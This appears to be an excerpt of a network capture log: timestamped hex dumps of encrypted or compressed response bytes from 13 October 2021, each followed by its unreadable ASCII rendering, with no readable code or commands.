                                                Data Ascii: yk-ZZzgsOC*-)S(z.$j-g(so"E(Hcr!)0K:Zqp6;DX>:<,I4L@o$m:B?1G;k%H[81xIg#iG?nlHq)1aa57gpz&U
                                                2021-10-13 18:36:04 UTC430INData Raw: 52 f0 75 8c 17 86 94 ef f9 56 50 6f 8d 9d 59 f2 2b 8d 62 bd c4 2e 2b 75 14 f9 e5 68 63 cb f8 50 17 90 5e 87 fd c5 58 4f cb fb 54 7d 85 2d aa d8 87 5f e1 ad 03 68 7d aa 26 0f 9a f8 d0 72 fb db bb da 11 a2 b2 13 be 23 40 96 0b e9 ad 98 46 a9 11 ac bb 29 2f 67 c8 50 db e1 a3 19 5b 55 10 3a 0a 4f 84 d2 69 3e 70 c4 5a 5f ea 82 b5 2b 60 d9 9b 6e c9 83 55 d3 82 39 14 a5 1f b4 4e 59 d3 94 f0 9b 8a a2 f8 d9 b2 10 0d 94 e3 a3 e8 89 de 03 94 ea 76 28 a0 7f a1 17 bf 3e 74 2d 65 f7 4f e5 81 91 4d 9e 13 a9 13 b1 c9 2d 47 8d bb 6d 84 db 95 83 9b 26 81 8f e5 6e 59 c6 75 86 cb ae b9 79 6b d8 10 2f 7a 3d 49 30 4b ef 1e cd f1 4f d9 d0 77 18 6f 79 a0 d9 b0 10 4f d9 e6 c8 0e 20 67 58 5d ac 57 6f bc 58 c5 87 71 ad 49 f5 7f 0d 3d 27 b8 fe 80 27 32 0c 2d 71 92 5d 5b cc 73 99 6c
                                                Data Ascii: RuVPoY+b.+uhcP^XOT}-_h}&r#@F)/gP[U:Oi>pZ_+`nU9NYv(>t-eOM-Gm&nYuyk/z=I0KOwoyO gX]WoXqI=''2-q][sl
                                                2021-10-13 18:36:04 UTC431INData Raw: 33 7c db 2a 51 70 7c e6 21 ec 56 5a 4b 21 28 3d 03 3b 79 bb d9 99 cf 41 8c f1 ac 10 24 60 86 26 f0 dc 02 29 dc a6 54 48 b5 22 ec 14 1d 60 f3 8d 48 ab 3b f0 0d a5 f7 95 f7 46 af 20 d6 eb 8d ae 93 dd e6 81 9a 60 7e d4 1c ca 82 dd 43 1c 27 5f 60 40 b5 a7 ec 1c ce 75 21 81 a8 75 46 ff 6a e0 44 27 59 e9 24 e2 3d 13 b2 50 94 f7 c6 f7 53 c4 5c f4 45 15 b5 34 51 dc 03 82 28 89 7f b8 a5 a2 53 ce 74 1f 45 fb ce 16 31 69 49 8b 29 79 15 cf 78 01 a3 25 fd 1a db 83 43 c9 9c f8 10 34 db 7c df db 8d 4c b3 84 b3 3a 76 0e 2d 23 50 6b ad 9c 89 b5 0f 9b dc 00 7c 31 6e e9 71 bb 77 60 27 76 51 6a 9a 4f c8 6e 0f cf e6 95 44 27 d7 33 d8 07 81 b4 99 5b ea fa e2 c4 21 ba fb 9d 39 14 2f 68 9d 7a 23 43 3d f7 ec 64 71 95 71 2f 95 95 2a e1 ef 45 6e 16 de d9 89 76 15 85 d0 ca 6b 89 4c
                                                Data Ascii: 3|*Qp|!VZK!(=;yA$`&)TH"`H;F `~C'_`@u!uFjD'Y$=PS\E4Q(StE1iI)yx%C4|L:v-#Pk|1nqw`'vQjOnD'3[!9/hz#C=dqq/*EnvkL
                                                2021-10-13 18:36:04 UTC433INData Raw: 04 a2 b0 8d c1 07 30 e2 30 40 53 c7 00 cd f7 be ca 74 1a dc f4 3f b7 32 f1 42 8f be a7 8a e9 29 a6 31 73 9a 44 7d a4 72 ff 90 f8 cf f8 8b 51 c6 61 e8 03 27 d6 56 59 c3 36 68 15 a5 0c 25 69 61 5a a6 9c f2 c7 ce ed e7 f7 41 3a 2c 28 ff 88 21 a0 9a fb 6d b7 61 a8 bd 61 41 e2 26 e6 c7 3c 99 5a c7 8c 1e d8 14 d2 ac ad c2 99 2b 26 af 28 0c 5a d4 30 45 9f 08 1e c7 ec 12 d5 34 2f 73 96 f9 6b 31 09 0e 01 a0 1c ab 58 4d 38 30 37 0a aa 7b ba 5e 32 dd 23 ba e1 bf db 9b 5e 8f 76 ba 76 8c 82 92 ef 4c 07 5a 4e a7 d5 9a 16 77 b1 20 c5 34 ff c9 c1 e5 07 02 a7 14 2c 5b 39 1f 0c d2 68 13 b1 13 11 65 dc 1d 4f 78 f6 c3 36 5d 3a 93 6e 0f a9 4f c8 20 df a1 a8 35 24 ca 62 ca a4 9f ef a2 82 3e 89 aa 8f 49 2d 68 2f 41 9e 18 18 e9 bb d9 fa d9 41 f0 f0 37 34 ab ce d9 32 5d f5 43 24
                                                Data Ascii: 00@St?2B)1sD}rQa'VY6h%iaZA:,(!maaA&<Z+&(Z0E4/sk1XM807{^2#^vvLZNw 4,[9heOx6]:nO 5$b>I-h/AA742]C$
                                                2021-10-13 18:36:04 UTC434INData Raw: a0 60 be 6c a6 08 22 8a 8f 25 80 80 fa 93 6d 77 83 29 87 41 2e e3 bf cb ba 53 a5 65 25 08 bd 20 6a 1c a8 27 da 08 01 8b d3 87 f1 ee d2 2c 8e 34 3b 02 9d 73 8d 51 e4 6e cf ed 54 48 9a 61 12 ff 7e 2d 95 bf df a9 84 db 4a bc 44 1f 98 fa 37 d4 5e 6a e3 d7 9e 82 f3 36 62 96 ef 52 51 25 61 9c 7f b9 c1 d1 e6 c6 f3 04 04 e9 07 a3 1f 4b 25 8f 74 29 c7 7b 94 2a 03 10 9d 0f 03 4c 02 2b 4c 51 6c b7 a5 28 ea 35 13 85 78 46 78 68 0b ad 21 4f f8 3f f9 cb f5 5a 4a 80 4d 96 d1 42 1d e3 bf db 9b eb b7 1d 58 47 82 6c 02 e3 44 35 06 0d ba 6a eb d1 61 d4 63 32 de d3 fe 4a 87 5e 4c bc 81 d8 aa f7 41 14 2a 25 3a 3d ff 70 68 0e e4 52 e3 4e 5f 80 21 6f 7d 0e 22 40 3a a8 98 fe 04 d9 83 ae 1c 5d e7 b3 32 ca 3a 9c b8 7e 69 cf cb 4e 5e bf d7 93 dc ce 66 5f 7f e3 fa d1 e0 c4 87 42 13
                                                Data Ascii: `l"%mw)A.Se% j',4;sQnTHa~-JD7^j6bRQ%aK%t){*L+LQl(5xFxh!O?ZJMBXGlD5jac2J^LA*%:=phRN_!o}"@:]2:~iN^f_B
                                                2021-10-13 18:36:04 UTC435INData Raw: ce 4c 83 4c b7 8d 94 fd 3b 11 37 f6 be 5b f4 62 a7 10 02 eb 09 49 0f 37 e2 eb a3 05 78 f3 41 78 3c 09 07 f2 d8 06 a6 5f e0 0e 99 41 d5 b3 ae ee 07 97 71 73 48 a5 58 92 ff 7f b9 6f 7e 49 39 09 73 4e 48 9c 1f b4 66 6c 11 b4 86 55 e0 ed 55 c9 00 eb 69 84 c3 c7 d4 ae b7 aa 94 e1 e7 94 53 79 9a f4 c7 ff 52 a5 78 be 60 f6 ea 3a 8a d6 ec 88 34 a4 25 6d 26 bb e4 1f c8 ba 41 29 66 91 1a 0d 96 52 a8 3d 5e 49 12 a9 db 93 79 aa 31 a1 7e 48 8f 5b a3 00 3f fc cc e7 06 46 3f 4d 7f ea 42 f5 47 f3 5a 5f ff 70 31 95 2d 55 42 91 c7 7d 8c da 19 67 d5 ae 37 30 e3 a5 04 e7 69 9c 02 0c 23 5a 59 f0 e3 94 0f 31 51 0d 80 b8 21 28 01 41 bf 81 a7 2e 63 6f 36 ac 1b df 74 87 34 84 ca 6a 28 d7 31 33 05 25 38 6c 28 d9 e9 25 c4 31 db 81 ba f9 92 f5 e1 76 72 09 b5 0b 1c 50 61 39 e7 5f 24
                                                Data Ascii: LL;7[bI7xAx<_AqsHXo~I9sNHflUUiSyRx`:4%m&A)fR=^Iy1~H[?F?MBGZ_p1-UB}g70i#ZY1Q!(A.co6t4j(13%8l(%1vrPa9_$
                                                2021-10-13 18:36:04 UTC437INData Raw: 68 65 c1 d0 98 dd 3a 2b 2c 74 71 48 d4 e3 78 f1 88 02 e1 82 79 18 06 26 86 fe 4a 56 37 3e f3 79 a2 6d 44 ac d4 af 93 4e e2 4a 8d 46 7a e8 50 9d 10 e9 77 7c 29 de 14 da 24 c4 e3 96 c8 20 29 d6 3e 76 4c b9 27 cc 7f 09 a6 86 2e bf d9 7f 90 70 a8 cf 5e b6 c6 73 81 b7 30 f3 ac a3 b5 a4 0e e5 f1 ed 86 04 04 b3 2d 2e 50 45 b9 72 44 bb c3 48 bd 38 55 2b 68 01 8b e8 76 b9 7b 55 a3 ff 25 e0 00 b8 79 0d 60 a0 89 f5 67 64 ca b5 98 24 83 9f ba 11 07 54 93 76 93 de 09 76 e8 69 50 49 fe 0b 13 b5 2c 4a af dc cf 0f ad 3f 1d e4 1b e0 ce 92 fb 96 a4 71 b6 07 34 46 72 17 55 3f 8c 3e 22 4a 09 40 39 c8 30 32 1b 73 84 89 af 3f d2 c3 e0 31 c6 53 5b 29 be 44 b1 e4 2c 0c eb 7b ae b5 26 53 a9 b2 5b 54 40 67 b3 d5 b1 c6 5e f6 67 b9 5b 26 37 07 75 0c be 93 39 a0 38 37 1b 01 45 21 fd
                                                Data Ascii: he:+,tqHxy&JV7>ymDNJFzPw|)$ )>vL'.p^s0-.PErDH8U+hv{U%y`gd$TvviPI,J?q4FrU?>"J@902s?1S[)D,{&S[T@g^g[&7u987E!
                                                2021-10-13 18:36:04 UTC438INData Raw: fd 69 3b 5f fa cf 77 77 11 6c 0f db 47 61 fd 06 dd d3 82 19 d9 a9 18 2e f6 72 f8 f0 e2 19 9a 73 6c fe 8a e1 13 11 87 60 f3 6f 99 63 e8 8d 15 b4 53 8a c2 9c 68 1e bf 19 10 3e fa 0d ef 46 3e ea 24 cb f0 61 41 04 24 fa 1c df a6 ad fc fb 73 5a d7 7a 6b b5 d7 1b a3 93 09 7f 85 54 e0 47 33 22 f4 32 b5 31 4d 8b 19 40 fa 01 40 e3 7f d9 f2 bf ba 96 86 0a 77 d6 73 e0 ee a4 4c c3 6c ba ab e0 49 f8 2a 07 25 69 4a de d0 5f c9 cf d8 c5 bf 13 8f 6c 22 eb 7b d0 a2 a5 39 32 ce aa f8 45 19 6c 3a a9 d6 73 33 2c af 6c 4e 90 94 41 7f ef 19 06 c5 a2 27 38 c8 27 24 11 d3 16 68 5d b7 74 de 6e ae e0 6f d8 5a 9a 92 70 66 15 c1 b1 e7 ce db e3 df f2 a6 5e 03 80 45 5a 23 24 60 75 cf a7 8a d7 65 8a d5 96 19 43 22 00 a1 0c 3a 1d 60 6f 4e f8 c7 e3 7f bf cd f4 54 7d a3 05 79 01 82 f1 d2
                                                Data Ascii: i;_wwlGa.rsl`ocSh>F>$aA$sZzkTG3"21M@@wsLlI*%iJ_l"{92El:s3,lNA'8'$h]tnoZpf^EZ#$`ueC":`oNT}y
                                                2021-10-13 18:36:04 UTC439INData Raw: 53 7b 30 91 8b 92 a9 87 4d cf f7 34 c9 e2 99 ae 15 2b 66 d1 55 ea f0 2e 68 00 bd 03 d4 e2 27 69 fe 88 1d 12 b7 19 7a e7 66 a8 aa 2e 56 7d 5a 0c 3e e1 6d 6d 18 72 21 b0 92 f6 3b 11 bb b6 dc 40 95 0f d3 c9 ea 44 dc 5c 77 cf d5 c1 cc a0 9e 90 92 9c 8a 00 4f 66 5e 52 86 1e ff 85 d5 61 71 82 36 9f 05 ad 15 57 8b 4e 2b c7 96 27 9c dd a3 3f 2d d5 20 05 89 40 76 f9 89 e4 05 8a 16 d9 80 8f 4a 63 f9 9c 15 7f d9 4a 09 8c be f3 f5 41 31 62 7b a2 3a 26 f3 dd 84 d4 1a b7 8d 57 d6 07 8e c5 8e 00 7d 68 b6 47 26 e8 35 06 02 fb ce 79 0f a8 83 49 31 8f eb af 2a f0 c7 f0 d1 25 b0 ca 70 ae 0d ba 53 d5 34 df 9f b5 87 80 27 60 60 7b cc c1 3d 05 9e 82 3c 90 5b 57 bc 4c bc 53 c4 b3 80 29 71 91 7b ad 42 40 6f f2 c0 55 d2 62 1b 50 51 cb e5 f6 5c 0d 7d c3 0f 6e e0 3d 0e 28 f1 40 f6
                                                Data Ascii: S{0M4+fU.h'izf.V}Z>mmr!;@D\wOf^Raq6WN+'?- @vJcJA1b{:&W}hG&5yI1*%pS4'``{=<[WLS)q{B@oUbPQ\}n=(@
                                                2021-10-13 18:36:04 UTC441INData Raw: cd cf 1a 60 d7 29 6a 1e ca 6b eb 63 bc 55 c5 c4 42 8d e3 44 3b 0b aa 91 46 93 80 d1 59 ce 6c 0b 32 23 55 dd 81 06 3c 8f 0c 34 99 7b bb e3 44 d6 ae 9d d4 ac bd c1 ce 3a 88 db 8f 42 42 1e 55 c4 47 3a b1 c5 f1 e1 92 40 e5 aa 92 ee 2f 5d ed fa bd 65 da a6 7a b8 60 3f 14 19 db be ea 2c e8 88 03 f9 ee 17 f3 0f 10 56 48 9d d3 15 b8 41 28 04 24 c4 e1 47 28 eb 54 3a 80 17 88 fc 7d 1e d5 93 73 28 3c 8f d7 87 4d 25 4a 54 d5 b6 6e 68 d5 3d 87 67 36 82 35 bf 86 a9 8e ea 3d d3 26 2d 70 07 fb 40 72 bc f4 4b 28 f2 c1 c0 0e 33 18 29 61 0c 95 68 90 f5 55 97 73 ad e4 c5 c2 b8 5e 60 74 84 b2 a4 94 e7 07 5e 72 43 39 0f b1 2c 7d 4c 9b 75 87 ae 6a 07 af 92 53 c7 78 2e f4 fd f8 ff 9c fa df 76 cc 68 e9 63 fc 5f 56 48 1a d0 60 c3 03 cd e1 da 1f a5 14 8f 23 42 a2 c0 fa 63 18 35 19
                                                Data Ascii: `)jkcUBD;FYl2#U<4{D:BBUG:@/]ez`?,VHA($G(T:}s(<M%JTnh=g65=&-p@rK(3)ahUs^`t^rC9,}LujSx.vhc_VH`#Bc5
                                                2021-10-13 18:36:04 UTC442INData Raw: 97 7a e5 64 de 07 8c 85 79 45 8f ba 3e 88 27 c1 f6 fe 54 0d a4 a1 57 c8 24 c9 c1 ec 9f 87 41 29 6d a4 33 a0 90 f7 5b 0f f2 dd b1 fe fa a6 ab 37 10 38 19 88 c4 53 ce cc a6 99 7f 77 89 7f 96 42 71 8e cb e8 8e d6 66 9c 3a 93 42 3f d4 1c d7 9d c3 6c 1e 7e f9 48 57 1e 84 fe 90 3a 4c ce d0 30 f8 99 72 cb 86 52 73 98 88 c5 03 e9 14 6c 0f f0 c6 be 29 c6 2a e0 24 dd 23 3b 86 76 5e c1 39 73 3d a6 f7 5e c8 76 35 5b f9 8d 1c c8 64 71 b6 09 29 88 e6 b0 ea 2d 64 6d d6 03 52 79 bd d7 80 1f 73 a7 f0 c7 81 11 64 7a 2f 7f f3 4e fb 03 1d 69 bd 6d 56 55 cb e7 0a d2 5c 49 10 cf 6d bc 9f b3 fd df cb e4 0c 60 2d e3 96 01 21 e1 3c 78 3a 8f 4b 86 7e 37 6d 4d 13 82 4e d7 60 06 ff d9 fd 8d b6 c6 d8 ec 5b 4f 22 ab c2 e6 5b 58 e4 4d 89 ad 42 52 fa b8 bc 6c e3 19 13 ae b7 29 5f c7 09
                                                Data Ascii: zdyE>'TW$A)m3[78SwBqf:B?l~HW:L0rRsl)*$#;v^9s=^v5[dq)-dmRysdz/NimVU\Im`-!<x:K~7mMN`[O"[XMBRl)_
                                                2021-10-13 18:36:04 UTC443INData Raw: fb b9 ca 06 d5 c2 54 f5 67 64 56 e0 46 bc f8 4a b5 17 58 eb 1a 6f 6d 2b 6f 88 23 b6 95 74 02 0d 43 eb b2 ec 20 3c 2b ca 44 9a c9 44 53 64 7d bb 7c fc f4 e1 3a 27 fe f2 d8 2f c2 bb e9 b6 bd d7 b2 51 d2 9d 1b f1 73 23 ee 29 6d 95 6c 32 c8 45 be b3 68 01 94 0d 7f f2 7b 66 63 4f 99 6c 16 39 e7 52 a0 36 61 ce 7f b7 3c 75 7d 89 4b 3b 10 1a e1 99 d5 e4 bc 4c a4 75 2a c6 6a 0b ab 0b 88 6e 35 98 eb b8 af c9 c3 d9 96 f1 a1 bc 63 e8 21 5a 65 de 33 9a 95 c7 f0 c0 b5 81 9b 73 8e c3 84 ad 0c 7f b9 77 54 f5 73 6a ec 8e c4 42 b3 00 2a cd 18 d4 28 fd 79 ab 01 b1 1b 7b 38 5a c3 db 97 c8 b1 cd 48 73 cf 8d b7 83 81 a3 13 b4 0a a4 1e d0 70 1c 39 a1 ad 17 8c ee 5d 79 09 92 e4 cc c2 7d b1 23 4e 77 9d 58 f4 26 39 0d a2 bd f1 d7 ef d5 9e 89 a6 40 a4 be 7c 8c 4f e4 fc c5 e0 4d 34
                                                Data Ascii: TgdVFJXom+o#tC <+DDSd}|:'/Qs#)ml2Eh{fcOl9R6a<u}K;Lu*jn5c!Ze3swTsjB*(y{8ZHsp9]y}#NwX&9@|OM4
                                                2021-10-13 18:36:04 UTC445INData Raw: 49 8f 58 5d e4 92 00 4e 4f c0 58 7f 9f 93 73 4f c0 5f 06 c2 44 97 56 69 67 6a 31 ac f2 b9 26 54 f9 78 1d a9 35 bb 5a 83 eb ae b3 db e6 2d 33 21 eb 8f e8 01 a4 b2 22 d3 82 27 7c 8e 1a f6 a6 b3 d5 db 81 59 6d 83 74 21 cb d8 99 6d 84 2a 3f 0e 08 2e d8 e8 99 5c a5 fe 9e 91 81 8a cb d5 b1 05 03 f5 51 c9 f0 23 97 68 ee 18 60 bb 75 c4 44 c2 ae 6e 13 b4 b6 f2 c4 10 56 ed 71 82 15 88 e5 00 83 4f cc 7b 15 75 93 dd 7a 37 eb 14 f0 c2 59 c2 69 ae 8c 7b a5 d8 03 9a 15 91 6d 41 36 d4 e0 5a 54 f3 a2 cd e9 ac bd 2e e4 cf fb dc 60 7e 7b a7 3b 20 6e ed 50 6b a5 82 98 f5 4a a8 24 1d 7d 0e d7 d6 1d 43 26 94 23 08 73 79 d4 05 2b 89 96 f3 54 51 e3 90 c8 cb f1 9d 71 9f e6 52 73 7e ee ce 00 c3 98 e4 96 0e 34 cb e8 d8 9c e5 e8 00 e8 8d 09 9f 1f 45 92 25 57 b9 07 c8 61 52 a7 15 8c
                                                Data Ascii: IX]NOXsO_DVigj1&Tx5Z-3!"'|Ymt!m*?.\Q#h`uDnVqO{uz7Yi{mA6ZT.`~{; nPkJ$}C&#sy+TQqRs~4E%WaR
                                                2021-10-13 18:36:04 UTC446INData Raw: bd 7f 2e 14 35 11 98 61 4f 6a 00 04 b1 cc 1a 67 57 dd 91 d9 43 32 cf 6e af be 54 5b 0e c4 f1 66 e1 7c a9 08 1e 71 5b e8 31 ae 9e 36 b2 13 86 2b 82 98 51 c7 ef 6f 08 cb 73 8c ce 94 19 34 1e 6a 1d 54 f1 88 d7 bf 7a eb 2f 7f b6 5a b3 91 72 1e cc 5f 75 6c 9d 66 60 d7 f0 df 91 58 ee 2b fc ea 3d 18 0d 47 ec 40 8a da 1b 6e 99 fe 74 1e c0 bf 07 a6 ab 06 f9 c5 ee 08 c3 d3 86 ce 25 6c e7 21 b2 2c e4 24 c4 5c 5f 9f cf be 46 a3 0c 3e ab 95 d6 a0 27 6b 87 64 a7 75 99 78 30 e3 b3 03 3c 27 cf 5e 61 f4 7b 37 a8 98 eb 55 8d 48 0e 32 18 0d a0 be 10 2f 57 f4 1d 36 67 e3 bd d4 00 97 ea e9 b6 a3 e9 78 0f 47 ea 7a 2c 97 b8 70 f4 4b 12 e8 d7 f7 5e dd 22 4f f4 8c c9 e3 bf d0 cf 58 ff cd f8 df b2 eb aa a7 26 7b 0e fe e9 b6 5d 37 10 99 a3 40 51 24 60 c8 c0 51 ce cd 12 9f 2a c5 ee
                                                Data Ascii: .5aOjgWC2nT[f|q[16+Qos4jTz/Zr_ulf`X+=G@nt%l!,$\_F>'kdux0<'^a{7UH2/W6gxGz,pK^"OX&{]7@Q$`Q*
                                                2021-10-13 18:36:04 UTC447INData Raw: ed 29 6a 59 dc 49 30 a7 1a 22 65 f9 4d 25 54 6c 2a 71 a5 b7 21 42 42 6b 9c 56 e0 65 f3 f2 74 11 bc 51 dd b8 7f 27 d6 90 e6 34 34 67 fd 60 75 96 d5 26 bb 5e 61 f7 9f 22 cc 7b a3 3e 7e da 72 06 06 0d a7 fe 59 da 16 23 46 83 d4 3f 83 54 41 96 00 78 25 5d fe fd 4f ea a1 d8 03 98 eb 5c b0 8b b0 6c 0d 4d b8 41 28 e2 08 40 8e 6f 22 d4 0c 2a ea 7d bb f4 49 5e f5 49 21 e7 6b 82 dd 27 18 25 4e 47 31 56 65 18 ad 87 50 58 1a c9 ad 25 fc 47 a8 91 67 15 7c d4 d9 8f 4f 41 fe ac ac 95 d0 90 ed 52 50 53 ee 6f 9f a2 88 ca 83 98 f8 3e 27 07 9e 90 f8 c0 63 dc 88 0b 0d bf db 26 27 77 14 2c e4 08 10 9b d3 88 cc 70 4c 83 4c bf c7 5c d5 88 df 96 ee ef a1 39 12 1b 6f 09 89 42 b0 b5 de c8 71 71 54 4b d2 f1 47 3a 95 89 2f 60 55 e3 3d 1c 12 30 f9 ba 97 7b e5 b5 81 0a 13 a1 01 88 8b
                                                Data Ascii: )jYI0"eM%Tl*q!BBkVetQ'44g`u&^a"{>~rY#F?TAx%]O\lMA(@o"*}I^I!k'%NG1VePX%Gg|OARPSo>'c&'w,pLL\9oBqqTKG:/`U=0{
                                                2021-10-13 18:36:04 UTC449INData Raw: b0 ed 47 32 f8 32 26 ee 87 48 ee c2 65 c8 c5 08 4c a4 91 32 e5 e2 31 59 f6 4d e0 6d 9a e0 9d b8 69 65 41 63 fb 63 fe ce 86 d3 8f 4b 33 30 c8 ad 52 9f 32 cc bf b9 62 f8 52 a1 64 5a e2 81 57 49 2e f4 da 16 12 43 f8 8b 46 a3 06 1d 65 1c 73 7a 2a e6 38 b8 9d 0d 38 85 44 aa 99 a6 fd 65 f8 d8 15 b0 81 01 69 1c cc 69 82 92 bc df 90 ea da 59 cf ac a5 a8 73 30 f3 4e 40 aa a9 85 7c 9a e3 b2 d2 a9 3a 72 f9 fa c6 77 a2 a5 f0 76 86 d4 1a df ac 8c f7 bf 3e 81 b5 36 8c 4d bc d5 99 62 2c e3 4e f0 67 fe f1 56 79 47 83 d9 93 69 94 ce 5d 7f 58 fc f1 4f 86 c6 d8 ee 0f b9 d9 90 cb 52 50 f3 29 ca 4a 5d 02 9e 94 f7 4e 77 8a f3 8e a6 32 e6 c0 d9 8d f4 28 ef 4a a1 ba 88 e1 18 e5 f2 c0 62 99 d7 b1 f7 06 0f 96 e8 2c c7 48 9b ec 33 0a 77 72 fa 0d bb 23 9a e2 c6 ac 4b d9 2a e1 ae be
                                                Data Ascii: G22&HeL21YMmieAccK30R2bRdZWI.CFesz*88DeiiYs0N@|:rwv>6Mb,NgVyGi]XORP)J]Nw2(Jb,H3wr#K*
                                                2021-10-13 18:36:04 UTC450INData Raw: e9 e0 79 82 a8 44 16 df ce 06 65 d7 dc 00 be c0 85 45 db fc 72 71 a4 35 82 49 8c dc de f8 a1 7b c8 d7 e3 5d 67 e3 d4 85 86 b4 b9 b0 10 bd da 5d d5 05 b1 e5 1a 04 97 b6 ae 98 68 bc f0 88 9c ee e5 36 d3 0a 6d f4 81 b3 3d f5 01 12 32 ee 05 86 b5 24 ef 94 d7 14 8c 8a 0a fe dd 09 71 12 51 95 61 40 07 bf 7d df 07 8e 17 2f 55 45 fb 58 d2 3c c0 fc e6 1c a2 a3 70 25 52 21 77 a5 78 37 94 d0 9d 9a 9c 4c 8c 78 36 e6 de 7c 69 9c 43 8a c3 85 40 fc 79 ed ed d9 5b a2 ef 72 85 97 a9 dd a0 aa 51 18 3e 8b f2 3a 22 76 3a 8b 62 4f 6c a3 07 fe 0e f1 cf c6 fd 29 93 6d 02 df b9 78 e7 9f 2e f0 c2 0f 67 e6 8b f9 3c 4f fb 7a af 5e 5a 78 64 b2 b6 1f f4 a2 bb 52 f3 3e 28 37 a6 ea 98 3b 2e 23 f9 95 0f 89 70 38 05 98 a3 8d 9c f8 47 c9 a6 d7 8a 90 ba 57 49 1b 31 a1 95 51 aa ef 4f 38 dd
                                                Data Ascii: yDeErq5I{]g]h6m=2$qQa@}/UEX<p%R!wx7Lx6|iC@y[rQ>:"v:bOl)mx.g<Oz^ZxdR>(7;.#p8GWI1QO8
                                                2021-10-13 18:36:04 UTC451INData Raw: ba a0 63 32 8c d6 10 96 95 6d 3e af 1a 2e 4c 79 da 11 a9 a2 ee c9 ac a1 b3 9b ab 4b 21 4a 9f 33 44 bc e8 b2 bf da 17 06 c4 53 e9 63 0a 6b a7 d4 34 93 93 cf eb b2 d1 dc 9b 46 43 82 83 e2 1b 7b 4e 0b aa ae 89 e3 fe 50 58 5e 56 cc 33 b4 bd c2 7b 36 e8 7d ad 31 0d 66 37 9f a2 3c 84 f2 e1 48 d9 2e 46 dc 86 27 1e 6f 71 f3 d9 6e 72 b1 91 16 2b d6 ea 87 59 c3 db ae 1f ba a6 8b 50 47 02 dd f3 ed 43 2d 7b ac 6a 60 c9 f6 d7 9d 65 53 25 02 03 8d be e0 c8 bf f6 6f 93 34 ad 76 03 96 28 00 37 96 d6 3a 03 73 78 23 59 ee 67 be f5 51 c2 eb 76 35 99 d3 b3 08 ab 81 9a 3b 11 fe 00 a2 2e bf 14 dd c9 bb 95 01 21 0a 7c 05 75 04 b2 22 c4 58 57 dd b4 9f 76 ff 3a 83 4d 34 8b 7a cf 4d 27 62 7d a5 26 cc 9a 16 9a fa dd 9f a5 71 4a b7 3c 70 d7 8a 71 1c 54 49 2d 97 e5 11 f4 d3 31 7e 24
                                                Data Ascii: c2m>.LyK!J3DSck4FC{NPX^V3{6}1f7<H.F'oqnr+YPGC-{j`eS%o4v(7:sx#YgQv5;.!|u"XWv:M4zM'b}&qJ<pqTI-1~$
                                                2021-10-13 18:36:05 UTC453INData Raw: 71 b3 af fc 0e 39 18 0b 3a d6 20 d3 81 e1 a7 39 9a 98 9a ec 33 3a 01 52 fb 66 61 d7 15 99 14 2d 7a 12 91 11 98 f5 4b 17 11 59 df 90 ea 10 b4 36 96 f8 c2 77 36 76 2f 76 39 3c 0f 5a 47 2a fe ca c6 9f 0a 1e ca 5d 4e 6c 1e cf ef f0 1e bd bf 22 fe e5 ad 33 50 45 4d b7 3a 86 d4 1d 16 32 95 eb 00 11 ae b0 f8 fc 81 40 81 bf df 88 8e c6 85 b6 79 b5 3e 9a 8c 7f f4 d3 51 2f 04 29 70 12 2b 76 2a e4 10 19 74 32 2d 9b 40 08 56 33 0e df d4 de 33 e9 27 dd 78 3c ac 83 69 65 ad 34 32 09 43 2d 6a 0c 97 18 25 bd 61 ea 71 d4 be ff 6d 90 e4 2b 85 9b 27 35 0b 7c db 1a 11 f5 92 d7 86 7a c1 ce 9b 70 15 05 94 ee 49 21 52 03 bb 7b 8c cb d8 b0 4a bd c2 59 ce 41 24 0d 4f 74 3b 4c 18 19 59 f7 ca 26 3e 9a e0 9a 1c cc 70 09 8f 5c 85 40 f0 04 b6 6d 8c 6f c2 4e 44 68 1f 46 b5 26 e7 0f 1e
                                                Data Ascii: q9: 93:Rfa-zKY6w6v/v9<ZG*]Nl"3PEM:2@y>Q/)p+v*t2-@V33'x<ie42C-j%aqm+'5|zpI!R{JYA$Ot;LY&>p\@moNDhF&
                                                2021-10-13 18:36:05 UTC457INData Raw: 02 2b 57 e1 9b 5c 59 fb f9 f3 cd e9 a2 32 32 95 88 05 95 8a 31 6a 02 12 d2 90 b8 4a b8 4b 11 4d 82 04 0f b1 2c ca 4b a2 bb 04 11 ac 4a 59 8e ce 7a 3c 7b 46 ea 3e 81 a9 ff 8f 1c d0 73 8e 66 9a 66 7b b4 b6 14 d4 3b 1e c6 67 1a 2c 7e 24 c5 dd 76 93 be 47 28 f8 3c 71 38 90 f5 5c d1 df 22 6a cf f9 ee 27 83 44 b0 a4 21 e4 b8 59 dc 0e 50 9e 8b e2 ce 71 91 63 11 e2 23 4e 08 1a 2b d5 f3 76 3f 1f f7 44 15 55 ad 10 25 5f 0f 9c 64 0a 2b 49 26 04 e2 30 e0 3b aa 70 30 f9 48 a9 3b 58 5f 02 be d5 b6 e8 0a 33 22 47 e0 df 86 d6 b6 7a 25 2c c9 44 f5 1b a3 b5 69 8d 4d 38 e4 1f 58 1a 25 2f fc 27 6c 11 af 74 1a 8a e4 c0 bb fd 7b b2 a5 24 f0 e5 3c 18 ea 21 4a 09 5a 58 e7 0f 9c ea 30 f9 72 36 26 a8 1a c4 5f 56 e5 ee ce 6e 11 4a 0e 6d 8c cd f8 93 6c 0c 23 45 1a fc 5e 8e 08 16 3a
                                                Data Ascii: +W\Y221jJKM,KJYz<{F>sff{;g,~$vG(<q8\"j'D!YPqc#N+v?DU%_d+I&0;p0H;X_3"Gz%,DiM8X%/'lt{$<!JZX0r6&_VnJml#E^:
                                                2021-10-13 18:36:05 UTC461INData Raw: 20 e5 8d f5 df 6c 16 3c a7 8f 11 5f e1 ad 90 28 c3 ff 8f 18 5c 62 49 77 bb ee 5d e2 af 27 75 42 83 4e 57 de a0 49 3e b9 70 00 7e 1f cf f4 2f 6f 8b 8d 38 94 e8 21 b2 75 9d 4c 58 44 ce 5a 7a fe 79 45 67 0c 78 34 b6 53 65 c7 5a 00 03 b2 92 7d 2e 78 3c 82 34 42 89 7e d4 31 83 5b ff 8f 39 1b 16 21 71 b2 23 29 e4 36 99 4a 28 2c 67 f4 d1 1a 8e d5 38 4d 0d 86 22 8a bc 41 10 64 69 a1 e3 d2 4c f5 55 f3 e2 de e3 b8 46 71 a7 02 11 a5 a0 40 97 49 8f 57 ba 18 3c b5 19 d9 87 b9 dc 15 17 67 f3 6a 3b 37 ce a0 af c9 74 f6 77 b4 98 85 8d 65 c9 54 02 18 81 c1 41 c6 15 1e 23 21 51 2d 10 3b 4e 4e a8 ef ec 12 47 9a d2 4b e5 ca f8 a3 3b a3 3e 36 b9 11 c6 cc 63 e7 50 7c 23 f9 7e 